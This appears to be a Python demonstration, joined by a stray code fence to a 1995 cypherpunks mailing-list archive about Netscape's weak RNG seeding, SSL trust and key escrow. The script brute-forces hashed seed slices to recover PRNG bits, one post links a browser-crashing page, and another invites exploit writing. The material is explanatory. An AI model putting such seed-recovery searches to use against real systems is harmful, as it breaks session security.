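"""Why MD5(select_bits(seed, start, stop)) leaks seed bits (added example).

Compares the contribution scheme quoted in the thread with the
MD5(select_bits(MD5(seed))) variant from the reply, by running the
brute-force search over the slice that Wagner describes against both.
"""

from __future__ import annotations

import hashlib
import secrets

SEED_BITS = 128  # assumption: a 128-bit PRNG seed
# Constructed seed for the demonstration; a real seed would be random.
EXAMPLE_SEED = 0x0123456789ABCDEFFEDCBA9876543210


def select_bits(value: int, start_bit: int, stop_bit: int) -> int:
    """Bits [start_bit, stop_bit) of value, least-significant bit numbered 0."""
    width = stop_bit - start_bit
    return (value >> start_bit) & ((1 << width) - 1)


def md5_int(value: int, nbytes: int) -> bytes:
    """MD5 of an integer encoded big-endian in nbytes bytes."""
    return hashlib.md5(value.to_bytes(nbytes, "big")).digest()


def contribution_proposed(seed: int, start_bit: int, stop_bit: int) -> bytes:
    """The form from the thread: hash of a raw n-bit slice of the seed."""
    width = stop_bit - start_bit
    return md5_int(select_bits(seed, start_bit, stop_bit), (width + 7) // 8)


def contribution_fixed(seed: int, start_bit: int, stop_bit: int) -> bytes:
    """Wagner's fix: slice a hash of the whole seed, then hash the slice."""
    seed_digest = int.from_bytes(md5_int(seed, SEED_BITS // 8), "big")
    width = stop_bit - start_bit
    return md5_int(select_bits(seed_digest, start_bit, stop_bit),
                   (width + 7) // 8)


def brute_force_slice(published: bytes, width: int) -> int | None:
    """Try all 2**width slice values; return the one whose MD5 was published."""
    nbytes = (width + 7) // 8
    for candidate in range(1 << width):
        if md5_int(candidate, nbytes) == published:
            return candidate
    return None


def demo(seed: int, start_bit: int = 0, stop_bit: int = 16) -> dict:
    """Run the slice search against both schemes and report what it yields."""
    width = stop_bit - start_bit
    true_slice = select_bits(seed, start_bit, stop_bit)
    # Proposed scheme: the search returns the actual seed bits.
    found_proposed = brute_force_slice(
        contribution_proposed(seed, start_bit, stop_bit), width)
    # Fixed scheme: the search returns a slice of MD5(seed) instead, which
    # reveals nothing about seed itself without inverting MD5.
    found_fixed = brute_force_slice(
        contribution_fixed(seed, start_bit, stop_bit), width)
    return {
        "true_slice": true_slice,
        "recovered_proposed": found_proposed,
        "recovered_fixed": found_fixed,
        "hash_work": 1 << width,  # far less than 2**SEED_BITS
    }


if __name__ == "__main__":
    for seed in (EXAMPLE_SEED, secrets.randbits(SEED_BITS)):
        result = demo(seed)
        print(f"seed slice {result['true_slice']:#06x}: proposed scheme "
              f"leaks {result['recovered_proposed']:#06x} after "
              f"{result['hash_work']} hashes; fixed scheme yields "
              f"{result['recovered_fixed']:#06x}, a slice of MD5(seed)")
```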
From fletch at ain.bls.com Mon Sep 25 13:39:29 1995
From: fletch at ain.bls.com (Mike Fletcher)
Date: Mon, 25 Sep 95 13:39:29 PDT
Subject: Article in 9/25 Computerworld about Netscape
Message-ID: <9509252034.AA08024@outland>

Just got the Sept 25th issue of Computer world in my box and it's got a big first page article on the NS bugs. They get the key lengths wrong (30-bit and 300-bit), and they say that "... future products will also use 300-bit keys." And they mention Cypherpunks by name! :)

--- Fletch
fletch at ain.bls.com   404 713-0414(w)   404 315-7264(h)
"Lisa, in this house we obey the Laws of Thermodynamics!" H. Simpson
PGP Print: 8D8736A8FC59B2E6 8E675B341E378E43

From herbs at interlog.com Mon Sep 25 13:39:55 1995
From: herbs at interlog.com (Herb Sutter)
Date: Mon, 25 Sep 95 13:39:55 PDT
Subject: Notes security question
Message-ID: <199509252039.QAA12982@gold.interlog.com>

At 14:52 1995.09.25 -0400, Jon Lasser wrote:
>On Fri, 22 Sep 1995, Herb Sutter wrote:
>
>> While I'm at it, here's a question I've been wondering about recently: Why
>> is it I've never heard of any security issues with Lotus Notes? Are there
>> no known weaknesses? Or did existing weaknesses just not get much press
>> because Notes isn't a commercially visible consumer product like Netscape?
>
>Perhaps the Notes pricing scheme is sooo outrageous (by the standards of
>a student like myself, and probably most others, if it's still anything
>like it was at the 1.0 release) that most people have had zero opportunity
>to examine the program, let alone really have time to play with it?

Good point. However, since it's been around for years and is (in some people's eyes, at least) cutting-edge secure replication technology, it made me begin to wonder about the product's actual security. All I know is that they use one of RSADSI's libraries, since RSADSI mentions them in their "here are our current users" advertising.
From the deafening silence, though, it seems like there's not a whole lot of information or opinion either way on Notes' security...?

Herb
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Herb Sutter 2228 Urwin, Suite 102 voice (416) 618-0184 Connected Object Solutions Oakville ON Canada L6L 2T2 fax (905) 847-6019

From dl at hplyot.obspm.fr Mon Sep 25 13:47:57 1995
From: dl at hplyot.obspm.fr (Laurent Demailly)
Date: Mon, 25 Sep 95 13:47:57 PDT
Subject: Another Netscape Bug (and possible security hole)
In-Reply-To: <199509221236.IAA03762@frankenstein.piermont.com>
Message-ID: <9509252047.AA01994@hplyot.obspm.fr>

It's not an exploit script, but you can find an auto crash "animation" for Ray's discovered bug on http://hplyot.obspm.fr/~dl/netscapesec/c1.html (or click from the updated http://hplyot.obspm.fr/~dl/netscapesec/)

Btw, from my tests, looks like the SunOs version is not crashing after 356 bytes like my first HPUX/Solaris test but needs a slightly longer url, if folks can try out the above urls and confirm/infirm crash for other platforms, thx !

dl
-- Laurent Demailly * http://hplyot.obspm.fr/~dl/ * Linux|PGP|Gnu|Tcl|... Freedom Prime#1: cent cinq mille cent cinq milliards cent cinq mille cent soixante sept assassination North Korea terrorist SEAL Team 6 radar supercomputer PLO

From raph at CS.Berkeley.EDU Mon Sep 25 14:01:53 1995
From: raph at CS.Berkeley.EDU (Raph Levien)
Date: Mon, 25 Sep 95 14:01:53 PDT
Subject: Netscape as vehicle for cypherpunk agenda/the cypherpunk bully pulpit
In-Reply-To: <199509251741.KAA04656@infinity.c2.org>
Message-ID: <199509252101.OAA09395@kiwi.cs.berkeley.edu>

I agree with Sameer's points here. Netscape carries with it the potential of revitalizing the cypherpunks agenda, but also, in the worst case, making it irrelevant. What happens, I think, depends on what we do.

On the plus side, Netscape 2.0 will, without a doubt, be the first usable mail tool to incorporate real encryption.
It may accomplish, almost overnight, the long-held goal of making a nontrivial fraction of Internet email secure.

Another potentially big win is the Java language. It seems to me that it will be quite plausible to code up real crypto applications in this language. Once coded, these applications will run on every important platform in the universe, and can be accessible by the click of a mouse. Perl-RSA was a sign of what's possible in the non-C world. One caveat is the slowdown from the interpreted code (roughly a factor of 25). The best way to look at this is as a challenge, to use clever coding tricks and intelligent architectures, including caching. The speed of Java implementations will inevitably improve - in fact, I might just be doing my PhD thesis on memory management in Java.

One potential downside, as Sameer points out, is the X.509 certification hierarchy. This ancient beast has the potential to defeat many of the cypherpunk aims, most especially the possibility of anonymous communication. However, that's not a foregone conclusion.

The most important thing to be doing right now is to _understand_ what's happening. Over the next couple of weeks, I'll be reading the S/MIME and X.509 documentation, poring over reference code, and (of course) playing with Netscape 2.0 myself. We're much more likely to get our agenda implemented if we are armed with a good understanding. There are lots of ways around X.509 - maybe we can work our way around it, maybe we can adapt it to our needs, maybe we can come up with something better and get it replaced. Whatever the case may be, we should not give up hope.

Netscape is one manifestation of the ancient Chinese curse: may we live in interesting times!
Raph

From jeffb at sware.com Mon Sep 25 14:13:36 1995
From: jeffb at sware.com (Jeff Barber)
Date: Mon, 25 Sep 95 14:13:36 PDT
Subject: SSL Man-in-the-middle
In-Reply-To:
Message-ID: <9509252112.AA29743@wombat.sware.com>

Simon Spero writes:
> Exactly - the trust model used in Navigator 1.1N requires you to trust
> every single owner of a valid certificate. Getting hold of any key is
> vastly easier than having to obtain a specific key; in the worst case,
> you just buy your own - SSL exchanges are repudiable, and a few simple
> tricks can make sure your certificate doesn't show up in the "Document
                ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
> Information" dialog box.

I'd appreciate some documentation for this, please. How can you make this happen?

-- Jeff

From norm at netcom.com Mon Sep 25 14:25:25 1995
From: norm at netcom.com (Norman Hardy)
Date: Mon, 25 Sep 95 14:25:25 PDT
Subject: "random" number seeds vs. Netscape
Message-ID:

At 12:29 PM 9/24/95, Ed Carp [khijol SysAdmin] wrote:
....
>I learned the hard way - keep the transmitters away from a reverse-biased
>diode acting as a noise generator. Only until I examined the output did
>I realize it wasn't random. I fixed it, though, by looking at the output
>and testing its randomness.
....

Very interesting. I wouldn't be too sure that a transmitted signal at a single frequency is the only signal that an opponent could use to bias your random numbers. How do you "test for randomness"? I think that signal to noise arguments, phrased in terms of entropy, can protect you against unknown and unwanted signal. (Ironically you want a very low signal to noise ratio!) Perhaps you merely take n/(S/N) bits from the HRNG when you need n bits and run them thru MD5. Here S is the signal strength of the maximum plausible unwanted signal, and N is the noise of the diode. I encourage both diode theorists and information theorists to quibble with the above formula!
From karlton at netscape.com Mon Sep 25 14:43:02 1995 From: karlton at netscape.com (Phil Karlton) Date: Mon, 25 Sep 95 14:43:02 PDT Subject: Netscape "random" number seed generator code available In-Reply-To: <4454nu$da8@tera.mcom.com> Message-ID: <3067219B.167E@netscape.com> > Will you put a picture up on http://www.netscape.com/ someone does find > a problem? If you look at my home page (see below), you can see a picture from about 25 years ago. If I have to shave my head, I will post before and after pictures. PK -- Philip L. Karlton karlton at netscape.com Principal Curmudgeon http://www.netscape.com/people/karlton Netscape Communications Corporation From paulp at CERF.NET Mon Sep 25 14:51:32 1995 From: paulp at CERF.NET (Paul Phillips) Date: Mon, 25 Sep 95 14:51:32 PDT Subject: Golden Coy Freeh In-Reply-To: <199509251253.IAA07006@pipe4.nyc.pipeline.com> Message-ID: On Mon, 25 Sep 1995, John Young wrote: > The New York Times, January 25, 1995, p. D5. > > The F.B.I. Sting Operation on Child Pornography Raises > Questions About Cryptography > > By Peter H. Lewis > > [snip] > > If the head of the F.B.I. acknowledged that his agency was > powerless to crack a cryptography program like Pretty Good > Privacy, the stampede for that software on the Internet > would make the run on Windows 95 look puny. That's a bizarre and naive statement. Is there anyone that thinks the spread of strong crypto has been less than rapid only because people are afraid it won't protect them against the government? Um, sorry, no. -- Paul Phillips | "Click _here_ if you do not | have a graphical browser" | -- Canter and Siegel, on | their short-lived web site From sharborth at hai-net.com Mon Sep 25 15:08:05 1995 From: sharborth at hai-net.com (sharborth at hai-net.com) Date: Mon, 25 Sep 95 15:08:05 PDT Subject: Net KiddiePorn Hype on TV Message-ID: <9508258120.AA812078118@houston_cc_smtp.hai-net.com> That's not all. 
This morning I was listening to National Peoples Radio when there was a story about the "Cyber Angels." It appears that the "Guardian Angels" from NYC are now out on the net trying to catch people talking about child pornography.

This will be real interesting to watch. I don't remember all of the story, but the best part I heard was when some "Cyber Angel" was talking about listening to a chat session and according to her, GIFs are codewords for pornography.

wsh

______________________________ Reply Separator _________________________________
Subject: Net KiddiePorn Hype on TV
Author: cypherpunks at toad.com (Cypherpunks Mailing List) at internet
Date: 25-09-95 11:28

Yet Another Alarmist TV Show About Child Molesters on the Net:

During their coverage of an NFL game on Sunday, the Fox announcers plugged an upcoming episode (sometime this week) of _New York Undercover_. They used a depressing line like "Think the Net is a safe place to play ? Think again !" Apparently the show will portray a child molester luring kids via the Net, etc., etc. "In a story pulled straight from today's headlines !"

Anyway, the mainstream media trashing of the Net continues. Check your local listings.

-Futplex

From unicorn at polaris.mindport.net Mon Sep 25 15:09:18 1995
From: unicorn at polaris.mindport.net (Black Unicorn)
Date: Mon, 25 Sep 95 15:09:18 PDT
Subject: Golden Coy Freeh
In-Reply-To: <199509251253.IAA07006@pipe4.nyc.pipeline.com>
Message-ID:

On Mon, 25 Sep 1995, John Young wrote:

> The New York Times, January 25, 1995, p. D5.
>
> The F.B.I. Sting Operation on Child Pornography Raises
> Questions About Cryptography
>
> By Peter H. Lewis
>
>
> Last week, Mr. Freeh stressed that he preferred a voluntary
> approach. But "if consensus is impossible" on the
> encryption issue, he said, the F.B.I. might consider other
> approaches.
>

I think it *tremendously* disturbing that the F.B.I. suddenly thinks itself part of the Legislative branch, able to make law and dictate policy to the rest of the country.

In fact there is a plague of this kind of thing, law making in the wrong channels, as if the executive agencies in the United States were suddenly able to implement their own law.

I think the F.B.I. needs to act like the Executive agency it is, advise the president, and then generally shut up. In short, like small children, the F.B.I. should be seen, and not heard. Unfortunately, I believe the children in this case will be Citizens of the United States.

>
> [End]

---
"In fact, had Bancroft not existed, potestas scientiae in usu est
Franklin might have had to invent him." in nihilum nil posse reverti
00B9289C28DC0E55 E16D5378B81E1C96 - Finger for Current Key Information

From jsw at neon.netscape.com Mon Sep 25 15:13:06 1995
From: jsw at neon.netscape.com (Jeff Weinstein)
Date: Mon, 25 Sep 95 15:13:06 PDT
Subject: Netscape "random" number seed generator code available
In-Reply-To: <199509251256.IAA27310@gatekeeper.itribe.net>
Message-ID: <4479g1$7ai@tera.mcom.com>

In article <199509251256.IAA27310 at gatekeeper.itribe.net>, bianco at itribe.net (David J. Bianco) writes:
> On Sep 25, 2:38, Phil Karlton sent the following to the NSA's mail
> archives:
> > Subject: Netscape "random" number seed generator code available
> || As is mentioned in the README, more will need to be done to find more
> || bits of entropy. (Too much of a good thing is still not enough.)
> || However the security team believes that the RNG seed is no longer the
> || weak link and candidate for attack. So I am personally volunteering
> || to have my head shaved if a discovered deficiency in this code results
> || in an easily attacked generated seed. [You will be expected to show
> || your work. :-)]
> ||
>
> Will you put a picture up on http://www.netscape.com/ if someone does find
> a problem? 8-)

I will make sure that a picture is available on the web if Phil has to shave his head.
--Jeff

--
Jeff Weinstein - Electronic Munitions Specialist
Netscape Communication Corporation
jsw at netscape.com - http://home.netscape.com/people/jsw
Any opinions expressed above are mine.

From rah at shipwright.com Mon Sep 25 15:17:56 1995
From: rah at shipwright.com (Robert Hettinga)
Date: Mon, 25 Sep 95 15:17:56 PDT
Subject: PM's Netscape rant
Message-ID:

At 3:24 PM 9/25/95, Vladimir Z. Nuri wrote:
> however I haven't seen any
>well-deserved rebuttals however, so..

I believe I've seen enough.

<*PLONK!*>

Now, that's why I *bought* Eudora...

Cheers,
Bob Hettinga

-----------------
Robert Hettinga (rah at shipwright.com)
Shipwright Development Corporation, 44 Farquhar Street, Boston, MA 02131 USA
(617) 323-7923
"Reality is not optional." --Thomas Sowell
>>>>Phree Phil: Email: zldf at clark.net http://www.netresponse.com/zldf <<<<<

From unicorn at polaris.mindport.net Mon Sep 25 15:25:36 1995
From: unicorn at polaris.mindport.net (Black Unicorn)
Date: Mon, 25 Sep 95 15:25:36 PDT
Subject: PM's Netscape rant
In-Reply-To: <199509251924.MAA05096@netcom18.netcom.com>
Message-ID:

On Mon, 25 Sep 1995, Vladimir Z. Nuri wrote:

> I thoroughly enjoyed PM's vituperative, venomous, and vitriolic
> Netscape rant. it just wouldn't be the cypherpunks list without
> the pit bull of the internet nipping at everyone's heels here
> and slaying any unwarranted peace!! however I haven't seen any
> well-deserved rebuttals however, so..
>
> I'm again going to be a netscape apologist and say, GEEZ, PM,
> will you take it easy, and untangle your underwear knots?
>
> as has been pointed out numerous times, the encryption in the Netscape
> code is designed to handle credit card number transport, *not*
> actual cash transport. its really silly to have more security
> present than is available than the weakest link. it would be like
> worrying about a fence around the white house when one is giving
> open tours to the public every day!!
Uh, there is a fence around the White House and they do give daily tours. I might add that there are a good number of people who worry about it every day.

I might also add that it is even more silly to design a software package, where additional security might easily be added, which has too little security to be expanded into other roles. This is called 'designed obsolescence.'

Wells Fargo bank is allowing account transactions over their webpage, one assumes this does, or will soon include "cash transfers."

>
> PM is rather secretive about the systems he is working on, but
> I suspect they are stock systems that must be highly secure because
> they actually involve *transfer* of cash, and *large*amounts* of it,
> in a *time-critical* environment, with *large corporate clients*. these
> are all inappropriate criteria to judge Netscape by.

I believe this is a demonstration of your lack of vision, "vznuri." Netscape's potential in the next 8-12 months alone dictates that they should be concentrating on attracting corporate clients, as does their new obligation to stockholders who have yet to see a penny of profit not related to speculation and stock price fluctuation.

> in the Netscape
> scenario, the software is *not* transferring cash itself, *not* transferring
> large amounts of it, and *not* in a time critical application, and *not*
> geared toward large corporations, but instead individual users.
> it is relying on another infrastructure (credit cards) for the actual
> transaction mechanisms.

For now, perhaps. It seems you would have that limitation written in stone.

>
> as has been pointed out numerous times, the whole
> credit card apparatus is somewhat based on "security through obscurity",
> i.e. the obscurity of a credit card number, and it doesn't make a whole
> lot of sense to try to make this more "secure".

I'm not quite sure you mean this, but if you do, you're just small minded. Why don't you read it again?

> this is a problem for
> credit card companies to fix (I agree it is a horrible problem, that costs
> us billions, and should have been fixed a long time ago) .. but holding
> credit card *using* companies responsible for this deficiency
> doesn't make sense. they are not the enemy!! they would surely seize the
> most secure mechanism available, if there were alternatives.

There are, they haven't.

> the distinction is subtle, but I think a relevant one:

Then it's unfortunate that you have missed it so completely.

> is
> the software itself transferring cash, or building on another system
> that does so? hopefully in the latter case, the requirements for a
> successful implementation are not so difficult to achieve (so that
> even fresh-out-of-college CS students can call the functions to
> do so, and perhaps code packages are written such that the user
> is protected from their own naivete, or what PM would call stupidity
> or incompetence).

Looking at Netscape, and moreover, the entire set of browsing programs, you speak like a petty government official. By limiting the scope of potential of various browsers you do nothing to further the cause of easy to reach strong crypto for everyone in a transparent and widely distributed package. Instead you believe we should forgive Netscape its oversights (and carelessness) because it was never meant to transfer funds over the internet. "It's a petty program, you should ignore it" is what you're really saying, which completely misses the fact, that millions of people are using/going to use it, and they are as likely to use it for banking as for shopping at home as for 'surfing.' Then again, perhaps your intent was never to make strong encryption available to the masses.

> --
>
> PM gives some excellent techniques for improving code security (some
> of these may not be exactly what he proposed):
>
> 1. hiring experts
> 2. code reviews
> 3. restrictions of who can work on what code (security clearance)
> 4. heavy testing
> 5. antagonistic attacks (i.e. hiring someone trying to crack the code that
> others have written)
> 6. open review of key code
>
> however, put all these things together and you get a company apparatus
> a bit more like the NSA than a commercial company. I agree that all
> these precautions are relevant for banking and stock transaction software
> transferring millions of dollars. but holding a joe-schmoe GUI and
> Web company responsible for this kind of paranoid oversight is really
> impossible and unrealistic and *unnecessary*.
>
> there will be some companies that specialize in creating the
> *secure*infrastructure* for communications transactions. other companies
> will just *latch on* to this existing infrastructure. hopefully the
> requirements for *latching on* will not be too difficult, otherwise we
> are all in trouble!!
>
> now, admittedly, it would be ideal if the netscape code was highly
> secure, but again, I just don't think it is in the best interests of
> this company to become security paranoid to the degrees that I have
> listed above, and the extreme degrees that people here are ranting about.
> rather they should try to blend in with other companies
> who specialize in cryptographic security. the latter companies should
> as much as possible provide foolproof modules. they should take care
> of all functions that have a potential for problem, such as random
> number generation, key exchange, etc. they should try to provide
> a minimum of training where the code is not foolproof.
>
> many have been making the point that one cannot judge the security of
> a package based simply on analyzing key modules. I actually don't think this
> has been proven in general and completely resolved yet. I can imagine
> modules that communicate with software such that the module
> itself is a "secure environment" in general, and
> it is almost impossible to misuse the software itself.
> (for example,
> the software might never store the actual keys of transactions itself,
> this being handled by a secure module, making it impossible to
> accidentally reveal them).
>
> some day we might actually see "secure module support" built into a
> microprocessor. in many ways the microprocessors that guard against
> illegal memory accesses and illegal function calls are in a sense
> providing a kind of cryptographic security. and people who study
> secure OSes generally eventually conclude that for ultimate security,
> you almost have to work from the ground up, starting with memory,
> microprocessors, and network hardware.
>
> --
>
> so my general point is that PM's rant, while lots of fun to read..
>
> >you @#$%^&* whippersnappers!! you don't have a @#$%^&* clue about
> >REAL code!! us old timers were writing code as secure and impenetrable
> >as granite bricks, impregnable as a frigid victorian grandmother,
> >before you were a twinkle in your mama's eye!! learn some
> >sufficient grovelling skills for your superiors or you will
> >not only be fired from your JOB but be excommunicated from the
> >entire INDUSTRY, perhaps even tarred, feathered, drawn, quartered, and
> >hung from your neck in the nearest tree!!! your employer will throw
> >you to the wolves, your customers will spit on your flayed carcass,
> >your family will look upon your shrivelled remains with shame, the
> >vultures will vomit your undigestable eviscerated entrails,
> >and the world immediately explode, if you have a
> >SINGLE BUFFER OVERFLOW *anywhere* in your code!!
>
> (ahem) this is not appropriate in the context of Netscape's aims, unless they
> want to become financial transaction experts more in line with banking
> expertise. netscape is more a "bring cyberspace to the masses" company,
> not "bring secure transactions to cyberspace".
> it's just because so
> few companies are successfully doing the latter, that netscape is forced
> to implement some "key" aspects of it to support the former. but I suspect
> they may ease out of the cryptographic security business in the long run,
> delegating it to other companies' plug-in-packages.
>
> furthermore, cyberspace is growing gradually. the way we get to really
> incredible secure transactions is through a growing process, an evolution
> in which mistakes are made at different levels, and which in the beginning
> the software is not much more than a toy that looks pretty and has the
> fewest moving parts and most simplistic design imaginable.
>
> I fully believe that some day a company in cyberspace will exist
> that satisfies PM's and all other cypherpunks' most erotic dreams
> about secure transactions. however that day is years away and it
> will take a long time to reach it. and I doubt that it will be the
> same company that is playing around with GUI's for the end user and
> hiring college programming hot-shots and Java geeks. IMHO netscape
> is probably not going to be the company that will try to bring the
> *lowlevel infrastructure* for cash, judging by the current winds,
> although that could change. they will definitely help guide its
> progress and be interacting with the companies that do, however.
>
> when the big Secure Transactions Inc. company is invented for
> cyberspace, *then* the kinds of absolutely uncompromising standards that PM
> embodies will be in place. but again, we cannot expect the companies
> of today to embody that ideology and atmosphere for a few years yet.
>
> the cypherpunks play a very valuable role in finding these "growing
> pain" mistakes of beginning companies such as Netscape,
> but we are not really serving our own best interests or the
> harmonious growth of cyberspace by vilifying/ embarrassing/
> browbeating/ humiliating companies or their employees over their security
> problems, at least if they are clearly responsive to far less ammunition.
> keep in mind that NSA unbreakable security is *just*not*appropriate* in
> every situation, and in fact "weak" encryption does have legitimate
> uses (i.e. in a world where people routinely lock their keys in their
> cars). (although I agree, in general one should always try to design a
> system to be as secure as possible.)
>
> (oops, I used the term "we" in that paragraph, a grave cypherpunk sin..
> my humble apologies; @#$%^&* cryptoanarchist vocabulary)
>
> that all said, nevertheless, I do enjoy PM's periodic displays of
> undigestable bile eruptions at least as much as one of the other
> infamous amusing crackpots circulating in this corner of cyberspace..
> (but geez, PM, were you raised by a pack of wild wolves or what?)
>
> p.s. to TCM: why do you continually find my login name abbreviation so
> fascinating??? my apologies to anyone if I am missing some kind of
> inside joke here, I'm a little dense at times
>
>

---
"In fact, had Bancroft not existed, potestas scientiae in usu est
Franklin might have had to invent him." in nihilum nil posse reverti
00B9289C28DC0E55 E16D5378B81E1C96 - Finger for Current Key Information

From jsw at neon.netscape.com Mon Sep 25 15:46:44 1995
From: jsw at neon.netscape.com (Jeff Weinstein)
Date: Mon, 25 Sep 95 15:46:44 PDT
Subject: SSL Man-in-the-middle
In-Reply-To: <199509251247.IAA27297@gatekeeper.itribe.net>
Message-ID: <447bes$7ai@tera.mcom.com>

In article , ses at tipper.oit.unc.edu (Simon Spero) writes:
> Exactly - the trust model used in Navigator 1.1N requires you to trust
> every single owner of a valid certificate.
> Getting hold of any key is
> vastly easier than having to obtain a specific key; in the worst case,
> you just buy your own - SSL exchanges are repudiable, and a few simple
> tricks can make sure your certificate doesn't show up in the "Document
> Information" dialog box.

Can you explain to me how you would get the Navigator to accept your certificate, but not display anything in the "Document Information" dialog?

--Jeff

--
Jeff Weinstein - Electronic Munitions Specialist
Netscape Communication Corporation
jsw at netscape.com - http://home.netscape.com/people/jsw
Any opinions expressed above are mine.

From sameer at c2.org Mon Sep 25 16:06:25 1995
From: sameer at c2.org (sameer)
Date: Mon, 25 Sep 95 16:06:25 PDT
Subject: WSJ on Netscape Hole 3
In-Reply-To:
Message-ID: <199509252300.QAA29812@infinity.c2.org>

He's -asking- for an exploit. T-shirts to Ray and the person who does the exploit, if it gets written. Maybe I should just ring up 8lgm and have them do one.

>
> On Mon, 25 Sep 1995, John Young wrote:
>
> > The Wall Street Journal, September 25, 1995, p. B12.
>
> > Marc Andreessen, vice president of technology at Netscape,
> > said the company will issue fixes for the recent glitches
> > later this week. He added that it's unclear whether
> > anything other than temporarily crashing a user's computer
> > could result from the recent flaw.
>
> Oh Marc, you didn't really want to say that, did you?
>
> -Thomas
>

--
sameer                                    Voice: 510-601-9777
Community ConneXion                       FAX: 510-601-9734
An Internet Privacy Provider              Dialin: 510-658-6376
http://www.c2.org (or login as "guest")   sameer at c2.org

From harveyrj at vt.edu Mon Sep 25 16:13:20 1995
From: harveyrj at vt.edu (R. J. Harvey)
Date: Mon, 25 Sep 95 16:13:20 PDT
Subject: Golden Coy Freeh
Message-ID: <9509252313.AA22112@toad.com>

At 06:10 PM 9/25/95 -0400, Black Unicorn wrote:
>On Mon, 25 Sep 1995, John Young wrote:
>>
>> Last week, Mr. Freeh stressed that he preferred a voluntary
>> approach.
>> But "if consensus is impossible" on the
>> encryption issue, he said, the F.B.I. might consider other
>> approaches.
>>
>
>I think it *tremendously* disturbing that the F.B.I. suddenly thinks
>itself part of the Legislative branch, able to make law and dictate
>policy to the rest of the country.
>
>In fact there is a plague of this kind of thing, law making in the wrong
>channels, as if the executive agencies in the United States were suddenly
>able to implement their own law.
>

Today I attended the Telecommunications Conference here in Blacksburg sponsored by Rep. Rick Boucher (D-VA), in which an interesting cast of characters (including Clarence Irving, Asst Secretary of Commerce for Telecommunication Policy, and presidents and Sr. VPs of Sprint, Time-Warner, GTE, Bell Atlantic) served as panelists. One purpose of the conference was to discuss the upcoming conference committee that will try to reconcile the House and Senate telco reform bills (which Boucher will likely be on).

After hearing each of these folks stress the importance of competitiveness, privacy, and security, during the Q&A session I asked the panel what they thought about the likelihood of government-mandated key escrow, which the FBI and others are likely to push. Only Boucher stood up to address the question, and he offered a forceful denunciation of the entire logic of mandated escrow, citing the litany of reasons against it, including the observation that it was ridiculous from a competitiveness standpoint, noting that no foreign customers would ever buy such systems because of the fear that, among others, "the CIA would be reading their mail." He hastened to note that although he felt strongly that in the current congress the calls for mandatory key escrow would go nowhere, "things could look very different" after the next round of elections. The guy from Commerce had nothing to say on the question.

rj

------------------------------------------------------------
R. J. Harvey                 email: harveyrj at vt.edu
WWW for job analysis/personality: http://harvey.psyc.vt.edu/
PGP key at http://harvey.psyc.vt.edu/RJsPGPkey.txt

From jkandt at mail.wsdot.wa.gov Mon Sep 25 16:19:35 1995
From: jkandt at mail.wsdot.wa.gov (Jeff Kandt)
Date: Mon, 25 Sep 95 16:19:35 PDT
Subject: Net KiddiePorn Hype on TV
Message-ID:

> That's not all. This morning I was listening to National Peoples
> Radio when there was a story about the "Cyber Angels." It appears
> that the "Guardian Angels" from NYC are now out on the net trying to
> catch people talking about child pornography.
>
> This will be real interesting to watch. I don't remember all of the
> story, but the best part I heard was when some "Cyber Angel" was
> talking about listening to a chat session and according to her, GIFs are
> codewords for pornography.
>
> wsh

I heard that piece too. Sounded like a total PR move for Curtis Slewah(sp?) and his Guardian Angels. They certainly didn't sound like they knew what they were doing, technically speaking.

Representatives from the EFF _AND_ the FBI talked about their "concerns" over private attempts to patrol cyberspace. The EFF representative pointed out that when you "see" a 15 yo female being propositioned by a 45 yo male you really have no idea if either party is what they purport to be. The FBI guy pointed out that there is no provision in the current law for anyone other than law enforcement to possess child pornography and the mere act of downloading such images, even if the intention is to turn them over to the police, would put the "Angels" in violation of the law; also concerned that they might get in the way of police undercover investigations.

Slewah himself admitted that there is no way to guarantee that his "Angels" don't tend towards pedophilia themselves and might not have completely pure motives.
-Jeff

-------
Jeff Kandt
jkandt at wsdot.wa.gov
Ph:(360)664-3510 (W)
"They that give up essential liberty to obtain a little temporary safety deserve neither liberty nor safety." --Benjamin Franklin, 1759
PGP Fingerprint: F1 59 8F 88 85 4F 2F 65 C2 5F D3 B5 8C 71 E0 E3

From jsw at netscape.com Mon Sep 25 16:20:41 1995
From: jsw at netscape.com (Jeff Weinstein)
Date: Mon, 25 Sep 95 16:20:41 PDT
Subject: Security Update news release
Message-ID: <9509251617.ZM167@tofuhut>

Here is the press release we put out this morning regarding the fix for RNG seed and stack overflow problems.

--Jeff

BETA VERSIONS OF NETSCAPE SECURITY UPDATE TO BE AVAILABLE WEDNESDAY FOR FREE DOWNLOADING

Company Puts New Code on Net for Examination; Outside Security Experts Reviewing Software

MOUNTAIN VIEW, Calif. (September 25, 1995) -- Netscape Communications Corporation (NASDAQ: NSCP) today announced that it has completed beta versions of the security update for its client and server software and will post the new software for free downloading from the Internet on Wednesday, September 27. The beta versions of the software updates, being posted following a review by internal and outside experts, are in response to the potential vulnerability in the company's security implementation discovered last weekend by two University of California at Berkeley students. In addition, Netscape is taking the opportunity to include other improvements with this update.

Netscape addressed the potential vulnerability by increasing the amount of random information it uses to seed the random number generator in its security implementation. In Netscape's security approach, the random number generated is used in a mathematical formula to create a "session key" for encrypting information to be sent across the Internet. The new solution uses many times more random information than the previous version, ensuring much greater degrees of difficulty in identifying the key used to encrypt a particular session.
The solution is also now assembled in a platform-dependent manner which, when combined with the increase in random information, makes Netscape's products substantially more secure than before the update.

Netscape's source code that will be used to address the potential vulnerability has already been posted on the Internet so that it can be reviewed by anyone wishing to do so. This technique is often used in the development of security software to ensure the highest level of inspection possible before the final software is made available to customers. The code is also being reviewed by external security experts retained by Netscape and various Netscape platform partners with expertise in specific operating system environments to provide additional checks on the soundness of Netscape's approach.

"We have always encouraged users to provide feedback on new versions of our software, and our posting of this security source code on the Internet is a natural extension of that approach," said Mike Homer, vice president of marketing at Netscape. "We plan to continue to use the Internet to test new software versions, as we will shortly with the beta version of our newly announced Netscape Navigator 2.0. We expect that this kind of open review will help us continue to create products of the highest quality."

Netscape is using the opportunity of this week's beta releases to also update other portions of its software, addressing such issues as domain-name limitations in international versions of Netscape Navigator and potential stack overflow conditions. Netscape is also placing the beta versions of the security updates for its Netscape servers on the Internet for free download by customers.

"We process hundreds of customer orders daily using Netscape software.
